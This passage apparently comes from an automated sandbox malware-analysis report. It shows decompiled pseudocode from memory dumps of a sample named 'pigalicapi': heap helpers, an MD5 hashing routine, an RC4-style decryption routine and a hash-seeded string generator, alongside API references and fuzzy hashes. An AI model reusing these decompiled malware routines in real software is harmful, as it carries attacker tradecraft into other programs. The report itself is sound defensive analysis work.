                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04005938
                                                                                                                                                                                                                                                                          0x04005943
                                                                                                                                                                                                                                                                          0x04005971
                                                                                                                                                                                                                                                                          0x04005986
                                                                                                                                                                                                                                                                          0x04005988
                                                                                                                                                                                                                                                                          0x0400598a
                                                                                                                                                                                                                                                                          0x0400598b
                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                          0x040059c6
                                                                                                                                                                                                                                                                          0x040059d6
                                                                                                                                                                                                                                                                          0x040059dc
                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                          0x040059ee
                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                          0x040059fb

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                          • Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                          • Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v91;
                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                          				char _v220;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                          					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                          					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                          					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                          						E04007D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                          						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                          						_v40 = _t59;
                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v220;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                          						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                          						E04007D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                          						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                          						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                          						_v91 = 0;
                                                                                                                                                                                                                                                                          						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                          						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04009409
                                                                                                                                                                                                                                                                          0x04009414
                                                                                                                                                                                                                                                                          0x0400943d
                                                                                                                                                                                                                                                                          0x04009442
                                                                                                                                                                                                                                                                          0x04009451
                                                                                                                                                                                                                                                                          0x04009454
                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                          0x04009480
                                                                                                                                                                                                                                                                          0x0400949a
                                                                                                                                                                                                                                                                          0x0400949f
                                                                                                                                                                                                                                                                          0x040094a2
                                                                                                                                                                                                                                                                          0x040094a9
                                                                                                                                                                                                                                                                          0x040094bf
                                                                                                                                                                                                                                                                          0x040094ab
                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                          0x040094d1
                                                                                                                                                                                                                                                                          0x040094ed
                                                                                                                                                                                                                                                                          0x040094fd
                                                                                                                                                                                                                                                                          0x04009502
                                                                                                                                                                                                                                                                          0x04009513
                                                                                                                                                                                                                                                                          0x04009519
                                                                                                                                                                                                                                                                          0x04009521
                                                                                                                                                                                                                                                                          0x04009533
                                                                                                                                                                                                                                                                          0x0400953c
                                                                                                                                                                                                                                                                          0x04009545
                                                                                                                                                                                                                                                                          0x04009460
                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                          0x04009553

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                          • Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 1000228B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 100728148-0
                                                                                                                                                                                                                                                                          • Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                          • Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040097C0(void* _a4) {
                                                                                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                                                                                          				char _t6;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_t6 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                                                                                                                                          					return _t6;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t3;
                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                          0x040097c7
                                                                                                                                                                                                                                                                          0x040097d6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040097d6
                                                                                                                                                                                                                                                                          0x040097dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                          • Opcode ID: a6464bf9f777ffb9bb0c8bcc6ffd973ce71ca1ca90abca8fff71af8c88fd8392
                                                                                                                                                                                                                                                                          • Instruction ID: 2832c38799f6bf1d51ab83c3035fa25f48ec3c6083bfe65adac79a8cd9b78ebe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6464bf9f777ffb9bb0c8bcc6ffd973ce71ca1ca90abca8fff71af8c88fd8392
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBC01271004208ABEB449F94D40CBA537ACEB04305F048111B60C95490C7789CC0C751
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040097A0(long _a4) {
                                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                                                                          0x040097b0
                                                                                                                                                                                                                                                                          0x040097b7

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                          • Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                          • Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                          • Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                          • Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                          • Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                          • Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 1000182F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                          • Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                                                          			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                          				long** _t35;
                                                                                                                                                                                                                                                                          				char* _t52;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t31 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                                                                                          						_t32 = GetLastError();
                                                                                                                                                                                                                                                                          						_v16 = _t32;
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t52 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t32 != 0) {
                                                                                                                                                                                                                                                                          							_t34 = _a16;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                          							if(_t34 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								_t35 =  &_v24;
                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                          								if(_t35 != 0) {
                                                                                                                                                                                                                                                                          									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04008cf6
                                                                                                                                                                                                                                                                          0x04008d01
                                                                                                                                                                                                                                                                          0x04008e1a
                                                                                                                                                                                                                                                                          0x04008e20
                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                          0x04008d35
                                                                                                                                                                                                                                                                          0x04008d3f
                                                                                                                                                                                                                                                                          0x04008d47
                                                                                                                                                                                                                                                                          0x04008d49
                                                                                                                                                                                                                                                                          0x04008d4f
                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                          0x04008d6d
                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                          0x04008d82
                                                                                                                                                                                                                                                                          0x04008d99
                                                                                                                                                                                                                                                                          0x04008da1
                                                                                                                                                                                                                                                                          0x04008da5
                                                                                                                                                                                                                                                                          0x04008db1
                                                                                                                                                                                                                                                                          0x04008db9
                                                                                                                                                                                                                                                                          0x04008dbb
                                                                                                                                                                                                                                                                          0x04008dc2
                                                                                                                                                                                                                                                                          0x04008dd5
                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                          0x04008df7
                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008d82

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008D49
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14
